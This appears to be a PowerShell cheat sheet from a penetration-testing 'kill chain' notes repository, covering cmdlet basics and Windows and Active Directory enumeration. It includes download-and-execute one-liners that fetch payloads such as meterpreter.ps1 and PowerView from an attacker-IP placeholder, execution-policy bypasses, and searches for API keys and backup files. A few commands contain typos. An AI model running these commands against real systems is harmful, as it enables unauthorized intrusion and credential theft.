whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Enumeration/Windows/Powershell.md

5.9 KiB
Raw Blame History

Powershell Usage

Get-Help

Get-Help Command-Name
  • Show examples
Get-Help Command-Name -Examples
  • Get-Command gets all the cmdlets installed on the current Computer.
Get-Command

Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*

Passing Output via Pipe

  • A pipe passes object including methods and attributes.
Verb-Noun | Get-Member

Get-Command | Get-Member -MemberType Method

Creating Objects from Previous Cmdlets

Get-ChildItem | Select-Object -Property Mode, Name
  • first - gets the first x object
  • last - gets the last x object
  • unique - shows the unique objects
  • skip - skips x objects

Filtering Objects

Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}

The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.

  • Where -operator is a list of the following operators:

  • -Match: matches the exact value of the property

  • -Contains: if any item in the property value is an exact match for the specified value

  • -EQ: if the property value is the same as the specified value

  • -GT: if the property value is greater than the specified value

Out-Gridview

Pipe the output to a graphical window and Filter it through the GUI.

whatever | Out-GridView

Sort Object

Verb-Noun | Sort-Object

Get-ChildItem | Sort-Object

Finding a File

Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}

Get-HotFix | Format-list | findstr  <searchstring>

Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
  • Find backup files
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
  • Find file contents
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY

Showing File Content

Get-Content 'C:\Program Files\interesting-file.txt'
  • Indexing lines
(Get-Content -Path file.txt)[index]
  • Search
Select-String <filename> -Pattern <pattern>

Copy File Content

Copy-Item <sourcefile> <destfile>

Count Lines of Output

As an example, count all cmdlets on the system

Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object

Count Words

Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word

Checksum of File

Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'

Current Working Directory

Get-Location

File Metadata

ls | Format-List *

Web Request

Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>

(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
  • Webrequest and execute in one go
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"

Base64 Decode File

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))

Circumvent Execution-Policy

powershell -ExecutionPolicy Bypass -File .\<file>

Set-ExecutionPolicy Bypass -Scope Process

Enumeration

Users

Get-LocalUser
  • Password not required users
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
  • SID of users
Get-WmiObject win32_useraccount | Select name, sid

Network intel

  • Connections
netstat -ano
  • IP Address
Get-NetIpAddress
  • Listening TCP Ports
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
  • TCP Port by number
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443

Patch level and updates

Get-Hotfix
  • Find patch by HotFixID
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284

wmic qfe get Caption,Description,HotFixID,InstalledOn

Drivers

driverquery

Processes

  • Start processes
Start-Process <process>
  • Running processes
Get-Process <process>

Scheduled tasks

schtasks /query /fo LIST /v

Get-ScheduledTaskInfo
  • Scheduled Tasks, by TaskName
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname

or

Get-ScheduledTask -TaskName taskname

Alternate Data Stream(ADS)

  • Show ADS
Get-Item -Path file.exe -Stream *
  • Open ADS
wmic process call create $(Resolve-Path file.exe:streamname)

Export Output

  • Export as CSV
Get-Process <process> | Export-Csv <output.csv>

ACL

  • Owner of files
Get-ACL C:\

Port Scanner

for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}

Ping Hosts

1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}

Antivirus

sc query windefend
  • Service name unknown
sc queryex type=service

Using Powerview

Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
  • Enumerate Group Policy
Get-NetGPO
  • Trust relationship to other domains
Get-NetDomainTrust
  • User enumeration
Find-LocalAdminAccess

whoami /priv

Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership

Services

List services that are running or stopped but always started automatically after reboot in the following way.

Get-Service | Where-Object {$_.State -eq "Running" -and $_.StartType -eq "Automatic"}
Get-Service | Where-Object {$_.State -eq "Stopped" -and $_.StartType -eq "Automatic"}